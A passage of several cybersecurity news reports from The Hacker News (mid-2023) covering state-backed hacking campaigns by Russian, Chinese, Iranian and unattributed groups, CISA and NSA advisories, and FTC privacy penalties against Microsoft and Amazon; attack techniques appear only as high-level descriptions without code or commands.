The findings demonstrate Russian threat actors' persistent efforts in harvesting valuable intelligence on various entities in Ukraine and across Europe, especially following the full-scale invasion of the country in February 2022.
The cyberwarfare operations aimed at Ukrainian targets have been notably marked by the widespread deployment of wiper malware designed to delete and destroy data, turning it into one of the earliest instances of large-scale hybrid conflict.
"BlueDelta will almost certainly continue to prioritize targeting Ukrainian government and private sector organizations to support wider Russian military efforts," Recorded Future concluded.
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks
26.6.23 BigBrothers The Hacker News
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest.
The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda.
"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said.
Volt Typhoon, as known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations.
An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against a limited number of victims to carry out long-term malicious acts.
It has been further described as a threat group that "favors web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives."
In one unsuccessful incident targeting an unspecified customer, the actor targeted the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server to trigger the execution of suspicious commands pertaining to process enumeration and network connectivity, among others.
"Vanguard Panda's actions indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for WMI," CrowdStrike said.
A closer examination of the Tomcat access logs unearthed several HTTP POST requests to /html/promotion/selfsdp.jspx, a web shell that's camouflaged as the legitimate identity security solution to sidestep detection.
The web shell is believed to have been deployed nearly six months before the aforementioned hands-on-keyboard activity, indicative of extensive prior recon of the target network.
While it's not immediately clear how Vanguard Panda managed to breach the ManageEngine environment, all signs point to the exploitation of CVE-2021-40539, a critical authentication bypass flaw with resultant remote code execution.
It's suspected that the threat actor deleted artifacts and tampered with the access logs to obscure the forensic trail. However, in a glaring misstep, the process failed to account for Java source and compiled class files that were generated during the course of the attack, leading to the discovery of more web shells and backdoors.
This includes a JSP file that's likely retrieved from an external server and which is designed to backdoor "tomcat-websocket.jar" by making use of an ancillary JAR file called "tomcat-ant.jar" that's also fetched remotely by means of a web shell, after which cleanup actions are performed to cover up the tracks.
The trojanized version of tomcat-websocket.jar is fitted with three new Java classes – named A, B, and C – with A.class functioning as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.
"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP in use by Vanguard Panda," CrowdStrike said, noting with moderated confidence that the implant is used to "enable persistent access to high-value targets downselected after the initial access phase of operations using then zero-day vulnerabilities."
U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog
25.6.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel devices (CVE-2023-27992).
CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019.
Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location.
The attack chain begins with the targeted victim receiving an iMessage with an attachment that automatically triggers the execution of the payload without requiring any interaction, making it a zero-click exploit.
"The malicious message is malformed and does not trigger any alerts or notifications for [the] user," Kaspersky noted in its initial report.
CVE-2023-32434 and CVE-2023-32435 are two of many vulnerabilities in iOS that have been abused in the espionage attack. One among them is CVE-2022-46690, a high-severity out-of-bounds write issue in IOMobileFrameBuffer that could be weaponized by a rogue app to execute arbitrary code with kernel privileges.
The weakness was remediated by Apple with improved input validation in December 2022.
Kaspersky flagged TriangleDB as containing unused features referencing macOS as well as permissions seeking access to the device's microphone, camera, and the address book that it said could be leveraged at a future date.
The Russian cybersecurity company's investigation into Operation Triangulation began at the start of the year when it detected the compromise in its own enterprise network.
In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are recommended to apply vendor-provided patches to secure their networks against potential threats.
The development comes as CISA issued an alert warning of three bugs in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could pave the way for a denial-of-service (DoS) condition.
The flaws – CVE-2023-2828, CVE-2023-2829, and CVE-2023-2911 (CVSS scores: 7.5) – could be exploited remotely, resulting in the unexpected termination of the named BIND9 service or exhaustion of all available memory on the host running named, leading to DoS.
This is the second time in less than six months that the Internet Systems Consortium (ISC) has released patches to resolve similar issues in BIND9 that could cause DoS and system failures.
NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems
24.6.23 BigBrothers The Hacker News
The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus.
To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition."
BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. A UEFI bootkit capable of bypassing Windows Secure Boot protections, samples of the malware have since emerged in the wild.
This is accomplished by taking advantage of a known Windows flaw called Baton Drop (CVE-2022-21894, CVSS score: 4.4) discovered in vulnerable boot loaders not added into the Secure Boot DBX revocation list. The vulnerability was addressed by Microsoft in January 2022.
This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable versions and execute BlackLotus on compromised endpoints.
UEFI bootkits like BlackLotus grant a threat actor complete control over the operating system booting procedure, thereby making it possible to interfere with security mechanisms and deploy additional payloads with elevated privileges.
It's worth noting that BlackLotus is not a firmware threat, and instead hones in on the earliest software stage of the boot process to achieve persistence and evasion. There is no evidence that the malware targets Linux systems.
"UEFI bootkits may lose on stealthiness when compared to firmware implants [...] as bootkits are located on an easily accessible FAT32 disk partition," ESET researcher Martin Smolár said in an analysis of BlackLotus in March 2023.
"However, running as a bootloader gives them almost the same capabilities as firmware implants, but without having to overcome the multilevel SPI flash defenses, such as the BWE, BLE, and PRx protection bits, or the protections provided by hardware (like Intel Boot Guard).
Besides applying the May 2023 Patch Tuesday updates from Microsoft, which addressed a second Secure Boot bypass flaw (CVE-2023-24932, CVSS score: 6.7) exploited by BlackLotus, organizations are advised to carry out the following mitigation steps -
Update recovery media
Configure defensive software to scrutinize changes to the EFI boot partition
Monitor device integrity measurements and boot configuration for anomalous changes in the EFI boot partition
Customize UEFI Secure Boot to block older, signed Windows boot loaders
Remove the Microsoft Windows Production CA 2011 certificate on devices that exclusively boot Linux
Microsoft, for its part, is taking a phased approach to completely close the attack vector. The fixes are expected to be generally available in the first quarter of 2024.
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments
19.6.23 BigBrothers The Hacker News
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
"The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week.
The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat."
The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange serves to infiltrate target networks.
Palo Alto Networks said it detected failed attempts to execute the China Chopper web shell in one of the attacks, prompting the adversary to shift tactics and leverage an in-memory Visual Basic Script implant from the Exchange Server.
A successful break-in is followed by reconnaissance activity to map out the network and single out critical servers that hold data of value, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.
CL-STA-0043 has also been observed leveraging native Windows tools for privilege escalation, thereby enabling it to create admin accounts and run other programs with elevated privileges.
Another privilege escalation method entails the abuse of accessibility features in Windows – i.e., the "sticky keys" utility (sethc.exe) – that makes it possible to bypass login requirements and backdoor the systems.
"In the attack, the attacker usually replaces the sethc.exe binary or pointers/references to these binaries in the registry, with cmd.exe," Rochberger explained. "When executed, it provides an elevated command prompt shell to the attacker to run arbitrary commands and other tools."
A similar approach employing the Utility Manager (utilman.exe) to establish persistent backdoor access to a victim's environment was documented by CrowdStrike earlier this April.
Besides using Mimikatz for credential theft, the threat actor's modus operandi stands out for utilizing other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as -
Using network providers to execute a malicious DLL to harvest and export plaintext passwords to a remote server
Leveraging an open-source penetration testing toolset called Yasso to spread across the network, and
Taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest
It's worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group referred to as Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server.
"This activity group's level of sophistication, adaptiveness, and victimology suggest a highly capable APT threat actor, and it is suspected to be a nation-state threat actor," Rochberger said.
New Report Reveals Shuckworm's Long-Running Intrusions on Ukrainian Organizations
15.6.23 BigBrothers The Hacker News
The Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec said in a new report shared with The Hacker News.
"In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said.
"The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more."
Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to the Russia's Federal Security Service (FSB). It's said to be active since at least 2013.
The cyber espionage activities consist of spear-phishing campaigns that are designed to entice victims into opening booby-trapped attachments, which ultimately lead to the deployment of information stealers such as Giddome, Pterodo, GammaLoad, and GammaSteel on infected hosts.
"Iron Tilden sacrifices some operational security in favor of high tempo operations, meaning that their infrastructure is identifiable through regular use of specific Dynamic DNS providers, Russian hosting providers, and remote template injection techniques," Secureworks notes in its profile of the threat actor.
In the latest set of attacks detailed by Symantec, the threat actors have been observed using a new PowerShell script to propagate the Pterodo backdoor via USB drives.
While Shuckworm's use of Telegram channels to retrieve the IP address of the server hosting the payloads is well documented, the threat actor is said to have expanded the technique to store command-and-control (C2) addresses on Telegraph, a blogging platform owned by Telegram.
Also used by the group is a PowerShell script ("foto.safe") that's spread through compromised USB drivers and features capabilities to download additional malware onto the host.
A further analysis of intrusions shows that the adversary managed to breach the machines of human resources departments of the targeted organizations, suggesting its attempts to glean information about various individuals working at those entities.
The findings are yet another indication of Shuckworm's continued reliance on short-lived infrastructure and its ongoing evolution of tactics and tools to stay ahead of the detection curve.
They also arrive a day after Microsoft shed light on destructive attacks, espionage, and information operations carried out by another Russian nation-state actor known as Cadet Blizzard targeting Ukraine.
"This activity demonstrates that Shuckworm's relentless focus on Ukraine continues," Symantec said. "It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations."
Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent
15.6.23 BigBrothers The Hacker News
Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate (GRU) and has a "relatively low success rate."
The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker DEV-0586, has graduated it to a named actor dubbed Cadet Blizzard.
"Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company said.
"While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard."
Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel wiper malware called WhisperGate (aka PAYWIPE) in the weeks leading to Russia's military invasion of the country.
The state-sponsored actor, per Microsoft, has a track record of orchestrating destructive attacks, espionage, and information operations aimed at entities located in Ukraine, Europe, Central Asia, and, periodically, Latin America.
Suspected to have been operational in some capacity since at least 2020, intrusions mounted by Cadet Blizzard have predominantly focused on government agencies, law enforcement, non-profit and non-governmental organizations, IT service providers, and emergency services.
"Cadet Blizzard is active seven days a week and has conducted its operations during its primary targets' off-business hours when its activity is less likely to be detected," Microsoft's Tom Burt said. "In addition to Ukraine, it also focuses on NATO member states involved in providing military aid to Ukraine."
It's worth noting that Cadet Blizzard also overlaps with groups monitored by the broader cybersecurity community under the names Ember Bear (CrowdStrike), FROZENVISTA (Google TAG), Nodaria (Symantec), TA471 (Proofpoint), UAC-0056 (CERT-UA), and UNC2589 (Google Mandiant).
Besides WhisperGate, the hacking crew is known to leverage a raft of weapons for its arsenal, including SaintBot, OutSteel, GraphSteel, GrimPlant, and more recently, Graphiron. Microsoft has attributed SaintBot and OutSteel to a related activity cluster labeled Storm-0587.
"Cadet Blizzard is also linked to the defacements of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as 'Free Civilian,'" Microsoft added.
Other notable tradecraft entails the use of living-off-the-land (LotL) techniques post gaining initial access to achieve lateral movement, collect credentials and other information, and deploy tools to facilitate defense evasion and persistence.
The cyber assaults, for their part, are accomplished through the exploitation of known flaws in exposed web servers (e.g., Atlassian Confluence and Microsoft Exchange Server) and content management systems.
"As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict," Microsoft noted.
Microsoft to Pay $20 Million Penalty for Illegally Collecting Kids' Data on Xbox
8.6.23 BigBrothers The Hacker News
Microsoft has agreed to pay a penalty of $20 million to settle U.S. Federal Trade Commission (FTC) charges that the company illegally collected and retained the data of children who signed up to use its Xbox video game console without their parents' knowledge or consent.
"Our proposed order makes it easier for parents to protect their children's privacy on Xbox, and limits what information Microsoft can collect and retain about kids," FTC's Samuel Levine said. "This action should also make it abundantly clear that kids' avatars, biometric data, and health information are not exempt from COPPA."
As part of the proposed settlement, which is pending court approval, Redmond has been ordered to update its account creation process for children to prevent the collection and storage of data, including obtaining parental consent and deleting said information within two weeks if approval is not obtained.
The privacy protections also extend to third-party gaming publishers with whom Microsoft shares children's data, in addition to subjecting biometric information and avatars created from a children's faces to the privacy laws.
Microsoft, per the FTC, violated COPPA's consent and data retention requirements by requiring those under 13 to provide their first and last names, email addresses, dates of birth, and phone numbers until late 2021.
Furthermore, the Windows maker is said to have shared the user data with advertisers by default until 2019 when consenting to Microsoft's service agreement and advertising policy.
"It wasn't until after users provided this personal information that Microsoft required anyone who indicated they were under 13 to involve their parent," the FTC said. "The child's parent then had to complete the account creation process before the child could get their own account."
Microsoft, however, chose to retain data collected from children during the account creation step for years even in scenarios where a parent did not complete the signup process, thereby contravening child privacy laws in the U.S.
The company has further been accused of creating a unique persistent identifier for underage accounts and sharing that information with third-party game and app developers and explicitly requiring parents to opt out in order to prevent their children from accessing third-party games and apps in Xbox Live.
Xbox, in response, said it's taking additional steps to improve its age verification systems and to ensure that parents are involved in the creation of child accounts for the service. It did not disclose the exact specifics of what such a system may be.
It also blamed some of the issues to a technical glitch that failed to "delete account creation data for child accounts where the account creation process was started but not completed," emphasizing that the data was promptly deleted and never "used, shared, or monetized."
This is not the first time a video game maker has been fined by the FTC over COPPA violations. In December 2022, Fortnite developer Epic Games reached a $520 million settlement with the agency in part for flouting online privacy laws for children.
The fines come as Microsoft disclosed it anticipates fines to the tune of "approximately $425 million" from the Irish Data Protection Commission (DPC) in the fourth quarter of 2023 for potentially violating the European Union General Data Protection Regulation (GDPR) to serve targeted ads to LinkedIn users.
The development also comes close on the heels of the FTC levying Amazon a cumulative $30.8 million fine over a series of privacy lapses regarding its Alexa assistant and Ring security cameras.
FTC Slams Amazon with $30.8M Fine for Privacy Violations Involving Alexa and Ring
5.6.23 BigBrothers The Hacker News
The U.S. Federal Trade Commission (FTC) has fined Amazon a cumulative $30.8 million over a series of privacy lapses regarding its Alexa assistant and Ring security cameras.
This comprises a $25 million penalty for breaching children's privacy laws by retaining their Alexa voice recordings for indefinite time periods and preventing parents from exercising their deletion rights.
"Amazon's history of misleading parents, keeping children's recordings indefinitely, and flouting parents' deletion requests violated COPPA and sacrificed privacy for profits," FTC's Samuel Levine said.
As part of the court order, the retail giant has been mandated to delete the collected information, including inactive child accounts, geolocation data, and voice recordings, and prohibited from gathering such data to train its algorithms. It's also required to disclose to customers its data retention practices.
Amazon has also agreed to fork out an additional $5.8 million in consumer refunds for breaching users' privacy by permitting any employee or contractor to gain broad and unfettered access to private videos recorded using Ring cameras.
"For example, one employee over several months viewed thousands of video recordings belonging to female users of Ring cameras that surveilled intimate spaces in their homes such as their bathrooms or bedrooms," the FTC noted. "The employee wasn't stopped until another employee discovered the misconduct."
The consumer protection authority, besides faulting Amazon for failing to adequately notify customers or obtain their consent before using the captured recordings for product improvement, called out the company for not implementing adequate security controls to protect Ring user accounts.
The "egregious" violations exposed users to credential stuffing and brute-force attacks, enabling miscreants to take control of the accounts and gain unauthorized access to video streams.
"Bad actors not only viewed some customers' videos but also used Ring cameras' two-way functionality to harass, threaten, and insult consumers—including elderly individuals and children—whose rooms were monitored by Ring cameras, and to change important device settings," it explained.
"Hackers taunted several children with racist slurs, sexually propositioned individuals, and threatened a family with physical harm if they didn't pay a ransom."
More than 55,000 U.S. customers are estimated to have had their accounts compromised between January 2019 and March 2020 as a result of these lax policies.
The proposed settlement further requires Amazon to purge all customer videos and facial data that it unlawfully obtained prior to 2018, and also take down any work products it derived from those videos.
While both settlements must be approved by a court to take effect, Amazon said "we take our responsibilities to our customers and their families very seriously" and that it's "consistently taken steps to protect customer privacy by providing clear privacy disclosures and customer controls, [...] and maintaining strict internal controls to protect customer data."
The development comes weeks after the FTC accused Meta of "repeatedly" violating its privacy promises and misleading parents about their ability to control with whom their children communicated through its Messenger Kids app between late 2017 and mid-2019.
The regulator is also seeking a blanket ban that would prohibit the company from profiting off of children's data. Meta has labeled the allegations as a "political stunt" and said it operates an "industry-leading privacy program."
China's Stealthy Hackers Infiltrate U.S. and Guam Critical Infrastructure Undetected
25.5.23 BigBrothers The Hacker News
A stealthy China-based group managed to establish a persistent foothold into critical infrastructure organizations in the U.S. and Guam without being detected, Microsoft and the "Five Eyes" nations said on Wednesday.
The tech giant's threat intelligence team is tracking the activity, which includes post-compromise credential access and network system discovery, under the name Volt Typhoon.
The state-sponsored actor is geared towards espionage and information gathering, with the cluster active since June 2021 and obscuring its intrusion footprint by taking advantage of tools already installed or built into infected machines.
Some of the prominent sectors targeted include communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education.
The company further assessed with moderate confidence that the campaign is "pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises."
A defining characteristic of the attacks is the "strong emphasis" on staying under the radar by exclusively relying on living-off-the-land (LotL) techniques to exfiltrate data from local web browser applications and leverage stolen credentials for backdoor access.
The main goal is to sidestep detection by harmonizing with regular Windows system and network activities, indicating that the threat actor is deliberately keeping a low profile to gain access to sensitive information.
"In addition, Volt Typhoon tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware," Microsoft said.
Another unusual tradecraft is the use of custom versions of open source tools to establish a command-and-control (C2) channel over proxy as well as other organizations' compromised servers in its C2 proxy network to hide the source of the attacks.
In one incident reported on by the New York Times, the adversarial collective breached telecommunications networks on the island of Guam, a sensitive U.S. military outpost in the Pacific Ocean, and installed a malicious web shell.
The initial entry vector involves exploiting internet-facing Fortinet FortiGuard devices by means of an unknown zero-day flaw, although Volt Typhoon has also been observed weaponizing flaws in Zoho ManageEngine servers. The access is then abused to steal credentials and break into other devices on the network.
The Windows makers also noted it directly notified targeted or compromised customers and provided them with the necessary information to secure their environments.
It, however, warned that it could be "particularly challenging" to mitigate such risks when threat actors make use of valid accounts and living-off-the-land binaries (LOLBins) to pull off their attacks.
Secureworks, which is monitoring the threat group under the name Bronze Silhouette, said it has "demonstrated careful consideration for operational security [...] and reliance on compromised infrastructure to prevent detection and attribution of its intrusion activity."
The development also comes as Reuters disclosed that Chinese hackers targeted Kenya's government in a far-reaching three-year-long series of attacks against key ministries and state institutions in an alleged attempt to obtain information about the "debt owed to Beijing by the East African nation."
The digital offensive is suspected to have been carried out by BackdoorDiplomacy (aka APT15, Playful Taurus, or Vixen Panda), which is known to target government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.
Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware
25.5.23 BigBrothers The Hacker News
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations.
Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections.
Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater. It's known to be active since at least December 2020.
In December 2022, the hacking crew was attributed to a set of attempted disruptive intrusions that were directed against diamond industries in South Africa, Israel, and Hong Kong.
These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++.
"The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said.
The infection sequence begins with the exploitation of vulnerabilities within internet-exposed web servers, leading to the deployment of a web shell referred to as ASPXSpy.
In the subsequent steps, the web shell is used as a conduit to deliver publicly-known tools in order to perform reconnaissance of the victim environment, move laterally, harvest credentials, and exfiltrate data.
Also executed on the compromised host is the Moneybird ransomware, which is engineered to encrypt sensitive files in the "F:\User Shares" folder and drop a ransom note urging the company to contact them within 24 hours or risk getting their stolen information leaked.
"The use of a new ransomware demonstrates the actor's additional efforts to enhance capabilities, as well as hardening attribution and detection efforts," the researchers said. "Despite these new 'covers,' the group continues to follow its usual behavior and utilize similar tools and techniques as before."
Agrius is far from the only Iranian state-sponsored group to engage in cyber operations targeting Israel. A report from Microsoft last month uncovered MuddyWater's collaboration with another cluster dubbed Storm-1084 (aka DEV-1084) to deploy the DarkBit ransomware.
The findings also come as ClearSky disclosed that no fewer than eight websites associated with shipping, logistics, and financial services companies in Israel were compromised as part of a watering hole attack orchestrated by the Iran-linked Tortoiseshell group.
In a related development, Proofpoint revealed that regional managed service providers (MSPs) within Israel have been targeted by MuddyWater as part of a phishing campaign designed to initiate supply chain attacks against their downstream customers.
The enterprise security firm further highlighted escalating threats to small and medium-sized businesses (SMBs) from sophisticated threat groups, which have been observed leveraging compromised SMB infrastructure for phishing campaigns and financial theft.
GUAC 0.1 Beta: Google's Breakthrough Framework for Secure Software Supply Chains
25.5.23 Security The Hacker News
Google on Wednesday announced the 0.1 Beta version of GUAC (short for Graph for Understanding Artifact Composition) for organizations to secure their software supply chains.
To that end, the search giant is making available the open source framework as an API for developers to integrate their own tools and policy engines.
GUAC aims to aggregate software security metadata from different sources into a graph database that maps out relationships between software, helping organizations determine how one piece of software affects another.
"Graph for Understanding Artifact Composition (GUAC) gives you organized and actionable insights into your software supply chain security position," Google says in its documentation.
"GUAC ingests software security metadata, like SBOMs, and maps out the relationship between software so that you can fully understand your software security position."
In other words, it's designed to bring together Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, deps.dev insights, and a company's internal private metadata to help create a better picture of the risk profile and visualize the relationships between artifacts, packages, and repositories.
With such a setup in place, the goal is to tackle high-profile supply chain attacks, generate a patch plan, and swiftly respond to security compromises.
"For example, GUAC can be used to certify that a builder is compromised (e.g., via credential leakage or ingestion of malware) and then query for affected artifacts," Google said.
"This enables the [chief information security officer] to easily create a policy to forbid use of any software from within the blast radius."
Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry
25.5.23 BigBrothers The Hacker News
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack.
Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456.
"The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code.
Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans.
That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with watering holes.
The attack method, also called strategic website compromises, works by infecting a website that's known to be commonly visited by a group of users or those within a specific industry to enable the distribution of malware.
In August 2022, an emerging Iranian actor named UNC3890 was attributed to a watering hole hosted on a login page of a legitimate Israeli shipping company that's designed to transmit preliminary data about the logged-in user to an attacker-controlled domain.
The latest intrusions documented by ClearSky show that the malicious JavaScript injected into the websites functions in a similar manner, collecting information about the system and sending it to a remote server.
The JavaScript code further attempts to determine the user's language preference, which ClearSky said could be "useful to the attacker to customize their attack based on the user's language."
On top of that, the attacks also make use of a domain named jquery-stack[.]online for command-and-control (C2). The goal is to fly under the radar by impersonating the legitimate jQuery JavaScript framework.
The development comes as Israel continues to be the most prominent target for Iranian state-sponsored crews. Microsoft, earlier this month, highlighted their new approach of combining "offensive cyber operations with multi-pronged influence operations to fuel geopolitical change in alignment with the regime's objectives."
Cyber Attacks Strike Ukraine's State Bodies in Espionage Operation
24.5.23 BigBrothers The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks targeting state bodies in the country as part of an espionage campaign.
The intrusion set, attributed to a threat actor tracked by the authority as UAC-0063 since 2021, leverages phishing lures to deploy a variety of malicious tools on infected systems. The origins of the hacking crew are presently unknown.
In the attack chain described by the agency, the emails targeted an unspecified ministry and purported to be from the Embassy of Tajikistan in Ukraine. It's suspected that the messages were sent from a previously compromised mailbox.
The emails come attached with a Microsoft Word document that, upon enabling macros, launches an encoded VBScript called HATVIBE, which is then used to drop additional malware.
This includes a keylogger (LOGPIE), a Python-based backdoor capable of running commands sent from a remote server (CHERRYSPY), and a tool focused on exfiltrating files with specific extensions (STILLARCH or DownEx).
It's worth noting that DownEx was recently documented by Bitdefender as being used by an unknown actor in highly targeted attacks aimed at government entities in Kazakhstan and Afghanistan.
"Additional study of the infrastructure and related files made it possible to conclude that among the objects of interest of the group are organizations from Mongolia, Kazakhstan, Kyrgyzstan, Israel, [and] India," CERT-UA said.
The findings show that some threat actors are still employing macro-based malware despite Microsoft disabling the feature by default in Office files downloaded from the web.
That said, Microsoft's restrictions have led several attack groups to experiment and adapt their attack chains and payload delivery mechanisms to include uncommon file types (CHM, ISO, LNK, VHD, XLL, and WSF) and techniques like HTML smuggling.
Enterprise security firm Proofpoint said it observed multiple initial access brokers (IABs) – actors who infiltrate major targets and then sell that access to other cybercriminals for profit – using PDF and OneNote files starting in December 2022.
"The experimentation with and regular pivoting to new payload delivery techniques by tracked threat actors, especially IABs, is vastly different from attack chains observed prior to 2022 and heralds a new normal of threat activity," the company said.
"No longer are the most experienced cybercriminal actors relying on one or a few techniques, but rather are frequently developing and iterating new TTPs. The rapid rate of change for many threat actors suggests they have the time, capability, and understanding of the threat landscape to rapidly develop and execute new techniques."
GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments
24.5.23 BigBrothers The Hacker News
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.
Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.
GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.
What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.
That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.
The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.
While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.
JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.
Geography of victims
Some of the other malware families deployed by GoldenJackal are as follows -
JackalSteal - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
JackalWorm - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
JackalPerInfo - A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.
JackalScreenWatcher - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.
Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.
"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."
China Bans U.S. Chip Giant Micron, Citing "Serious Cybersecurity Problems"
24.5.23 BigBrothers The Hacker News
